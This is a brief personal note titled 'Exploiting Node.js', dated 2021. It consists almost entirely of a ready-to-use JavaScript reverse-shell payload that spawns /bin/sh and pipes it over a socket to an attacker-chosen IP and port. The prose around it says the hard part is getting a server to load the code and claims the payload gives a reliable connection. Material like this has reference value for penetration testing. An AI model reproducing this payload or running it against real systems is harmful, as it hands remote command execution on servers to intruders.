Exploiting Node.js
- author:: Nathan Acks
- date:: 2021-10-09
The hard part of popping a reverse shell on a Node.js server is tricking the server to load your code. If you can figure out how to do that, this seems to produce a reliable connection:
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(1234, "127.0.0.1", function(){
// Customize port and IP address above to taste
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents Node.js from crashing
})();